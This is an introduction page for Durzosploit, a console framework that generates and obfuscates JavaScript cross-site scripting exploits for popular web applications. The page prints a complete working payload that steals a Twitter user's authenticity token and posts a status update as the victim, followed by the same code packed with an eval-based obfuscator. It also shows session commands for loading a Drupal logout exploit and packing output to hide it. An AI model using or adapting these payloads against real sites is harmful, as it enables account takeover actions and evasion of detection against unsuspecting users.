Durzosploit Introduction
From Engineering For Fun
Durzosploit is a javascript exploits generator framework that works through the console. This goal of that project is to quickly and easily generate working exploits for cross-site scripting vulnerabilities in popular web applications or web sites.
Durzosploit does not find browser vulnerabilities, it only is an framework containing exploits you can use.
Contents |
Installation
The best way to install Durzosploit is through its SVN because that's where you'll get all the latest updates and exploits. Otherwise grab an archived copy from our website.
The only thing you need to use Durzosploit is Ruby.
A Quick How-to
Before obfuscation:
function XHRRequest(sURL, sMethod, sVars, fnDone) { var xmlhttp, bComplete = false; try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { try { xmlhttp = new XMLHttpRequest(); } catch (e) { xmlhttp = false; } } } if (!xmlhttp) return null; sMethod = sMethod.toUpperCase(); try { if (sMethod == "GET") { xmlhttp.open(sMethod, sURL+"?"+sVars, true); sVars = ""; } else { xmlhttp.open(sMethod, sURL, true); xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1"); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); } xmlhttp.onreadystatechange = function(){ if (xmlhttp.readyState == 4 && !bComplete) { bComplete = true; if(fnDone) fnDone(xmlhttp.responseText); } }; xmlhttp.send(sVars); } catch(e) { return false; } return true; } function urlencode(str) { var histogram = {}, tmp_arr = []; var ret = str.toString(); var replacer = function(search, replace, str) { var tmp_arr = []; tmp_arr = str.split(search); return tmp_arr.join(replace); }; histogram["'"] = '%27'; histogram['('] = '%28'; histogram[')'] = '%29'; histogram['*'] = '%2A'; histogram['~'] = '%7E'; histogram['!'] = '%21'; histogram['%20'] = '+'; ret = encodeURIComponent(ret); for (search in histogram) { replace = histogram[search]; ret = replacer(search, replace, ret) } return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) { return "%"+m2.toUpperCase(); }); return ret; } function twitter_update_status_exploit() { this.run = function() { new XHRRequest("/home", "GET", "", this.exploit); } this.exploit = function(responseText) { authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g); var authtoken = authreg.exec(responseText); authtoken = authtoken[1]; updateEncode = urlencode("hello moto :)"); new XHRRequest("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update"); } } new twitter_update_status_exploit().run();
After obfuscation:
eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[035-8k-wyzA-H]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0 m(d,b,f,h){6 a,c=n;7{a=3 s("Msxml2.t")}8(e){7{a=3 s("Microsoft.t")}8(e){7{a=3 XMLHttpRequest()}8(e){a=n}}}k(!a)5 null;b=b.u();7{k(b=="v"){a.w(b,d+"?"+f,l);f=""}else{a.w(b,d,l);a.y("Method","z "+d+" HTTP/1.1");a.y("Content-Type","application/x-www-form-urlencoded")}a.onreadystatechange=0(){k(a.readyState==4&&!c){c=l;k(h)h(a.responseText)}};a.send(f)}8(e){5 n}5 l}0 A(a){6 c={},j=[];6 g=a.toString();6 i=0(d,b,f){6 h=[];h=f.split(d);5 h.join(b)};c["\'"]=\'%27\';c[\'(\']=\'%28\';c[\')\']=\'%29\';c[\'*\']=\'%2A\';c[\'~\']=\'%7E\';c[\'!\']=\'%21\';c[\'%20\']=\'+\';g=encodeURIComponent(g);for(o in c){p=c[o];g=i(o,p,g)}5 g.p(/(\\%([a-z0-9]{2}))/g,0(d,b,f){5"%"+f.u()});5 g}0 B(){q.C=0(){3 m("/D","v","",q.E)}q.E=0(d){F=3 RegExp(/twttr.form_authenticity_token = \'(.*)\';/g);6 b=F.exec(d);b=b[1];G=A("hello moto :)");3 m("/H/r","z","authenticity_token="+b+"&H="+G+"&tab=D&r=r")}}3 B().C();',[],44,'function|||new||return|var|try|catch||||||||||||if|true|XHRRequest|false|search|replace|this|update|ActiveXObject|XMLHTTP|toUpperCase|GET|open||setRequestHeader|POST|urlencode|twitter_update_status_exploit|run|home|exploit|authreg|updateEncode|status'.split('|'),0,{}))
Help
Managing your session
$ ruby durzosploit (dz) > session new example new project example added to session (dz) > session new example2 new project example2 added to session (dz) > session show [1] example * [2] example2 (dz) > session select 2 (dz) > session delete 1 exploit deleted (dz) > session show [1] example2 (dz) > session select 1 (dz) > session info session name: example2 Exploits loaded: Dependencies: (dz) > search exploits ... drupal/logout - Drupal 6.x - makes target logout (dz) > load drupal/logout Please fill out the parameters: Path_to_drupal [/]: (dz) > session info session name: example2 Exploits loaded: [1] => drupal/logout - Drupal 6.x - makes target logout Dependencies: [1] => XHRRequest.js (dz) >quit
Obfuscators
Durzosploit provides some obfuscators to automatically pack/minify your generated exploit:
(dz) > generate Your completed exploit can be found there output/example.js (dz) > search obfuscators packr - DeanEdward's packer minify - simple clean of the javascript code (dz) > obfuscate minify Successfuly packed project to output/example.ob.js with Minify (dz) > obfuscate packr Successfuly packed project to output/example.ob.js with Packr (dz) > obfuscate minify packr Successfuly packed project to output/example.ob.js with Minify Successfuly packed project to output/example.ob.js with Packr (dz) >
